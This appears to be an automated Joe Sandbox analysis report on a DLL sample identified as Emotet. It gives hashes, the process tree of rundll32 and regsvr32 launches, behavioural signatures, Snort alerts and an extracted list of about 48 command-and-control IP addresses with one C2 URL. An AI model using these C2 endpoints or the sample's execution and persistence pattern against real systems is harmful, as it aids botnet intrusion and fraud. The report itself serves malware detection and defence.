Edit tour

Windows Analysis Report
En3ZIyuYdw.dll

Overview

General Information

Sample Name:	En3ZIyuYdw.dll
Analysis ID:	745000
MD5:	633fd626fe5a1328fac74f20daf91f59
SHA1:	01d495949dd7e86ebdaf326da882d022d73c1d7f
SHA256:	23a872dfbba73a7f72bd24c68a0a3f5294bd0f60cab1ed0e5b2c80735fcb40ac
Tags:	dllexe
Infos:

Detection

Emotet

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected Emotet

System process connects to network (likely due to code injection or exploit)

Snort IDS alert for network traffic

Creates an autostart registry key pointing to binary in C:\Windows

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Tries to load missing DLLs

Drops PE files to the windows directory (C:\Windows)

Connects to several IPs in different countries

Registers a DLL

Found large amount of non-executed APIs

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

loaddll64.exe (PID: 4360 cmdline: loaddll64.exe "C:\Users\user\Desktop\En3ZIyuYdw.dll" MD5: C676FC0263EDD17D4CE7D644B8F3FCD6)

conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 1408 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\En3ZIyuYdw.dll",#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

rundll32.exe (PID: 1648 cmdline: rundll32.exe "C:\Users\user\Desktop\En3ZIyuYdw.dll",#1 MD5: 73C519F050C20580F8A62C849D49215A)

regsvr32.exe (PID: 1876 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\KkpTOJipNydtZ\ukztcGVtQBo.dll" MD5: D78B75FC68247E8A63ACBA846182740E)

regsvr32.exe (PID: 4768 cmdline: regsvr32.exe /s C:\Users\user\Desktop\En3ZIyuYdw.dll MD5: D78B75FC68247E8A63ACBA846182740E)

regsvr32.exe (PID: 5992 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\HVTkRBUydWHs\wOpoKzU.dll" MD5: D78B75FC68247E8A63ACBA846182740E)

rundll32.exe (PID: 2256 cmdline: rundll32.exe C:\Users\user\Desktop\En3ZIyuYdw.dll,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)

regsvr32.exe (PID: 2992 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\RJsEQYV\DCGMIKhx.dll" MD5: D78B75FC68247E8A63ACBA846182740E)

regsvr32.exe (PID: 6084 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\IASGzYkaksn\BFlBQr.dll" MD5: D78B75FC68247E8A63ACBA846182740E)

regsvr32.exe (PID: 5768 cmdline: C:\Windows\system32\regsvr32.exe" "C:\Windows\system32\RJsEQYV\DCGMIKhx.dll MD5: D78B75FC68247E8A63ACBA846182740E)

regsvr32.exe (PID: 1444 cmdline: C:\Windows\system32\regsvr32.exe "C:\Users\user\AppData\Local\QYzAfBQRbM\CtOPL.dll" MD5: D78B75FC68247E8A63ACBA846182740E)

cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["172.105.115.71:8080", "218.38.121.17:443", "186.250.48.5:443", "103.71.99.57:8080", "85.214.67.203:8080", "85.25.120.45:8080", "139.196.72.155:8080", "103.85.95.4:8080", "198.199.70.22:8080", "209.239.112.82:8080", "78.47.204.80:443", "36.67.23.59:443", "104.244.79.94:443", "62.171.178.147:8080", "195.77.239.39:8080", "103.56.149.105:8080", "80.211.107.116:8080", "93.104.209.107:8080", "174.138.33.49:7080", "202.28.34.99:8080", "178.62.112.199:8080", "114.79.130.68:443", "118.98.72.86:443", "103.41.204.169:8080", "178.238.225.252:8080", "83.229.80.93:8080", "46.101.98.60:8080", "82.98.180.154:7080", "87.106.97.83:7080", "196.44.98.190:8080", "139.59.80.108:8080", "103.224.241.74:8080", "103.254.12.236:7080", "185.148.169.10:8080", "165.22.254.236:8080", "37.44.244.177:8080", "54.37.228.122:443", "51.75.33.122:443", "128.199.217.206:443", "188.165.79.151:443", "210.57.209.142:8080", "160.16.143.191:8080", "175.126.176.79:8080", "202.134.4.210:7080", "103.126.216.86:443", "190.145.8.4:443", "128.199.242.164:8080", "64.227.55.231:8080"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.700027974.0000000180001000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000C.00000002.461600527.0000000180001000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000003.00000002.314902232.00000000020E0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.314643058.000001F1B4D30000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000002.317524653.0000020509D30000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.699849743.0000000002750000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000003.00000002.315217709.0000000180001000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.312512000.0000000180001000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000C.00000002.461398791.0000000002660000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.312680060.0000000180001000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.313418088.000001F592EC0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author
6.2.regsvr32.exe.2750000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.1f1b4d30000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.1f592ec0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.regsvr32.exe.20e0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.regsvr32.exe.2660000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.2.loaddll64.exe.20509d30000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.regsvr32.exe.20e0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.1f592ec0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.regsvr32.exe.2750000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.2.loaddll64.exe.20509d30000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.regsvr32.exe.2660000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.1f1b4d30000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 7 entries

Snort Signatures

ET CNC Feodo Tracker Reported CnC Server TCP group 3 - Source IP: 192.168.2.5 - Destination IP: 115.178.55.22

Timestamp:	192.168.2.5115.178.55.2249700802404304 11/13/22-16:54:45.127001
SID:	2404304
Source Port:	49700
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: En3ZIyuYdw.dll

Virustotal: Detection: 45%

Perma Link

Source: 00000006.00000002.697285078.0000000000D98000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Emotet {"C2 list": ["172.105.115.71:8080", "218.38.121.17:443", "186.250.48.5:443", "103.71.99.57:8080", "85.214.67.203:8080", "85.25.120.45:8080", "139.196.72.155:8080", "103.85.95.4:8080", "198.199.70.22:8080", "209.239.112.82:8080", "78.47.204.80:443", "36.67.23.59:443", "104.244.79.94:443", "62.171.178.147:8080", "195.77.239.39:8080", "103.56.149.105:8080", "80.211.107.116:8080", "93.104.209.107:8080", "174.138.33.49:7080", "202.28.34.99:8080", "178.62.112.199:8080", "114.79.130.68:443", "118.98.72.86:443", "103.41.204.169:8080", "178.238.225.252:8080", "83.229.80.93:8080", "46.101.98.60:8080", "82.98.180.154:7080", "87.106.97.83:7080", "196.44.98.190:8080", "139.59.80.108:8080", "103.224.241.74:8080", "103.254.12.236:7080", "185.148.169.10:8080", "165.22.254.236:8080", "37.44.244.177:8080", "54.37.228.122:443", "51.75.33.122:443", "128.199.217.206:443", "188.165.79.151:443", "210.57.209.142:8080", "160.16.143.191:8080", "175.126.176.79:8080", "202.134.4.210:7080", "103.126.216.86:443", "190.145.8.4:443", "128.199.242.164:8080", "64.227.55.231:8080"]}

Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00007FFA0AE79410 CryptStringToBinaryA,CryptStringToBinaryA,		0_2_00007FFA0AE79410
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00007FFA0AE79410 CryptStringToBinaryA,CryptStringToBinaryA,		3_2_00007FFA0AE79410

Source: En3ZIyuYdw.dll

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00007FFA0AE6C334 FindFirstFileExW,		0_2_00007FFA0AE6C334
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00007FFA0AE6C334 FindFirstFileExW,		3_2_00007FFA0AE6C334

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\regsvr32.exe	Network Connect: 115.178.55.22 80			Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 172.105.115.71 8080			Jump to behavior

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2404304 ET CNC Feodo Tracker Reported CnC Server TCP group 3 192.168.2.5:49700 -> 115.178.55.22:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	IPs: 172.105.115.71:8080
Source: Malware configuration extractor	IPs: 218.38.121.17:443
Source: Malware configuration extractor	IPs: 186.250.48.5:443
Source: Malware configuration extractor	IPs: 103.71.99.57:8080
Source: Malware configuration extractor	IPs: 85.214.67.203:8080
Source: Malware configuration extractor	IPs: 85.25.120.45:8080
Source: Malware configuration extractor	IPs: 139.196.72.155:8080
Source: Malware configuration extractor	IPs: 103.85.95.4:8080
Source: Malware configuration extractor	IPs: 198.199.70.22:8080
Source: Malware configuration extractor	IPs: 209.239.112.82:8080
Source: Malware configuration extractor	IPs: 78.47.204.80:443
Source: Malware configuration extractor	IPs: 36.67.23.59:443
Source: Malware configuration extractor	IPs: 104.244.79.94:443
Source: Malware configuration extractor	IPs: 62.171.178.147:8080
Source: Malware configuration extractor	IPs: 195.77.239.39:8080
Source: Malware configuration extractor	IPs: 103.56.149.105:8080
Source: Malware configuration extractor	IPs: 80.211.107.116:8080
Source: Malware configuration extractor	IPs: 93.104.209.107:8080
Source: Malware configuration extractor	IPs: 174.138.33.49:7080
Source: Malware configuration extractor	IPs: 202.28.34.99:8080
Source: Malware configuration extractor	IPs: 178.62.112.199:8080
Source: Malware configuration extractor	IPs: 114.79.130.68:443
Source: Malware configuration extractor	IPs: 118.98.72.86:443
Source: Malware configuration extractor	IPs: 103.41.204.169:8080
Source: Malware configuration extractor	IPs: 178.238.225.252:8080
Source: Malware configuration extractor	IPs: 83.229.80.93:8080
Source: Malware configuration extractor	IPs: 46.101.98.60:8080
Source: Malware configuration extractor	IPs: 82.98.180.154:7080
Source: Malware configuration extractor	IPs: 87.106.97.83:7080
Source: Malware configuration extractor	IPs: 196.44.98.190:8080
Source: Malware configuration extractor	IPs: 139.59.80.108:8080
Source: Malware configuration extractor	IPs: 103.224.241.74:8080
Source: Malware configuration extractor	IPs: 103.254.12.236:7080
Source: Malware configuration extractor	IPs: 185.148.169.10:8080
Source: Malware configuration extractor	IPs: 165.22.254.236:8080
Source: Malware configuration extractor	IPs: 37.44.244.177:8080
Source: Malware configuration extractor	IPs: 54.37.228.122:443
Source: Malware configuration extractor	IPs: 51.75.33.122:443
Source: Malware configuration extractor	IPs: 128.199.217.206:443
Source: Malware configuration extractor	IPs: 188.165.79.151:443
Source: Malware configuration extractor	IPs: 210.57.209.142:8080
Source: Malware configuration extractor	IPs: 160.16.143.191:8080
Source: Malware configuration extractor	IPs: 175.126.176.79:8080
Source: Malware configuration extractor	IPs: 202.134.4.210:7080
Source: Malware configuration extractor	IPs: 103.126.216.86:443
Source: Malware configuration extractor	IPs: 190.145.8.4:443
Source: Malware configuration extractor	IPs: 128.199.242.164:8080
Source: Malware configuration extractor	IPs: 64.227.55.231:8080

Source: Joe Sandbox View	ASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
Source: Joe Sandbox View	ASN Name: OVHFR OVHFR

Source: Joe Sandbox View	IP Address: 172.105.115.71 172.105.115.71
Source: Joe Sandbox View	IP Address: 188.165.79.151 188.165.79.151

Source: unknown

Network traffic detected: IP country count 20

Source: unknown	TCP traffic detected without corresponding DNS query: 115.178.55.22
Source: unknown	TCP traffic detected without corresponding DNS query: 115.178.55.22
Source: unknown	TCP traffic detected without corresponding DNS query: 115.178.55.22
Source: unknown	TCP traffic detected without corresponding DNS query: 172.105.115.71
Source: unknown	TCP traffic detected without corresponding DNS query: 172.105.115.71
Source: unknown	TCP traffic detected without corresponding DNS query: 172.105.115.71
Source: unknown	TCP traffic detected without corresponding DNS query: 172.105.115.71
Source: unknown	TCP traffic detected without corresponding DNS query: 172.105.115.71
Source: unknown	TCP traffic detected without corresponding DNS query: 172.105.115.71
Source: unknown	TCP traffic detected without corresponding DNS query: 172.105.115.71
Source: unknown	TCP traffic detected without corresponding DNS query: 172.105.115.71
Source: unknown	TCP traffic detected without corresponding DNS query: 172.105.115.71
Source: unknown	TCP traffic detected without corresponding DNS query: 172.105.115.71
Source: unknown	TCP traffic detected without corresponding DNS query: 172.105.115.71
Source: unknown	TCP traffic detected without corresponding DNS query: 172.105.115.71

Source: regsvr32.exe, 00000006.00000002.699146633.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.552442627.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.429595707.0000000000E14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000006.00000003.429644678.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.420630482.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.699620744.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.419733121.0000000000E7C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.429490488.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.420947938.0000000000E65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/
Source: regsvr32.exe, 00000006.00000003.429644678.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.420630482.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.699620744.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.429490488.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.420947938.0000000000E65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/OID
Source: regsvr32.exe, 00000006.00000003.552676823.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.551356715.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.697374729.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.429326267.0000000000DDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: regsvr32.exe, 00000006.00000002.699146633.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.552442627.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.420938439.0000000000E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.429595707.0000000000E14000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.420592395.0000000000E5F000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.6.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 00000006.00000002.699146633.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.429562298.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.420560474.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.552442627.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.429595707.0000000000E14000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.699678610.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.419733121.0000000000E7C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?5aadc5d031174
Source: regsvr32.exe, 00000006.00000003.552676823.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.551356715.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.697374729.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.429326267.0000000000DDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://172.105.115.71:8080/
Source: regsvr32.exe, 00000006.00000003.552676823.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.429368493.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.429582850.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.697412124.0000000000E01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.551356715.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.552051098.0000000000E01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.697374729.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.429326267.0000000000DDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://172.105.115.71:8080/lgtwttxoush/zjavbsyvuswch/zmcgteyprilxxwqk/

E-Banking Fraud

Yara detected Emotet

Source: Yara match	File source: 6.2.regsvr32.exe.2750000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.1f1b4d30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.1f592ec0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.20e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.regsvr32.exe.2660000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll64.exe.20509d30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.20e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.1f592ec0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.regsvr32.exe.2750000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll64.exe.20509d30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.regsvr32.exe.2660000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.1f1b4d30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.700027974.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.461600527.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.314902232.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.314643058.000001F1B4D30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.317524653.0000020509D30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.699849743.0000000002750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.315217709.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.312512000.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.461398791.0000000002660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.312680060.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.313418088.000001F592EC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\System32\rundll32.exe

File deleted: C:\Windows\System32\RJsEQYV\DCGMIKhx.dll:Zone.Identifier

Jump to behavior

Source: C:\Windows\System32\loaddll64.exe

File created: C:\Windows\system32\IASGzYkaksn\

Jump to behavior

Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00007FFA0AE73FB0	0_2_00007FFA0AE73FB0
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00007FFA0AE6A370	0_2_00007FFA0AE6A370
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00007FFA0AE6C334	0_2_00007FFA0AE6C334
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00007FFA0AE6ABC0	0_2_00007FFA0AE6ABC0
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00007FFA0AE71910	0_2_00007FFA0AE71910
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180020454	0_2_0000000180020454
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180028C94	0_2_0000000180028C94
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800038A5	0_2_00000001800038A5
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800248E0	0_2_00000001800248E0
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180005DB4	0_2_0000000180005DB4
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180004DDC	0_2_0000000180004DDC
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018000B1E0	0_2_000000018000B1E0
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180009E38	0_2_0000000180009E38
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180003BE8	0_2_0000000180003BE8
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180009BEC	0_2_0000000180009BEC
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800173F8	0_2_00000001800173F8
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180017BF8	0_2_0000000180017BF8
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180015400	0_2_0000000180015400
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180001000	0_2_0000000180001000
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018000741C	0_2_000000018000741C
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018000E828	0_2_000000018000E828
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180002834	0_2_0000000180002834
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180014C48	0_2_0000000180014C48
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018002005C	0_2_000000018002005C
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180016464	0_2_0000000180016464
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180005478	0_2_0000000180005478
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180006880	0_2_0000000180006880
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018002748C	0_2_000000018002748C
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018001308C	0_2_000000018001308C
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180024098	0_2_0000000180024098
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018001B898	0_2_000000018001B898
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018000C498	0_2_000000018000C498
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180004CA0	0_2_0000000180004CA0
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800110AC	0_2_00000001800110AC
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800148B0	0_2_00000001800148B0
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800078B6	0_2_00000001800078B6
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180001CCC	0_2_0000000180001CCC
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018000B8D0	0_2_000000018000B8D0
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800198DC	0_2_00000001800198DC
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800038DC	0_2_00000001800038DC
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800264F8	0_2_00000001800264F8
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800084F8	0_2_00000001800084F8
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018000BD00	0_2_000000018000BD00
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180015508	0_2_0000000180015508
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180018D0C	0_2_0000000180018D0C
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180012110	0_2_0000000180012110
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018001B520	0_2_000000018001B520
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180029124	0_2_0000000180029124
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180013524	0_2_0000000180013524
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180009D24	0_2_0000000180009D24
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180023D28	0_2_0000000180023D28
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180002128	0_2_0000000180002128
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180020930	0_2_0000000180020930
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180009144	0_2_0000000180009144
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018001F550	0_2_000000018001F550
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180020D54	0_2_0000000180020D54
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180010954	0_2_0000000180010954
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180018560	0_2_0000000180018560
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018000E570	0_2_000000018000E570
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018001C974	0_2_000000018001C974
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018000F174	0_2_000000018000F174
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180025D84	0_2_0000000180025D84
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180005590	0_2_0000000180005590
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180017198	0_2_0000000180017198
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800159A0	0_2_00000001800159A0
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180011DAC	0_2_0000000180011DAC
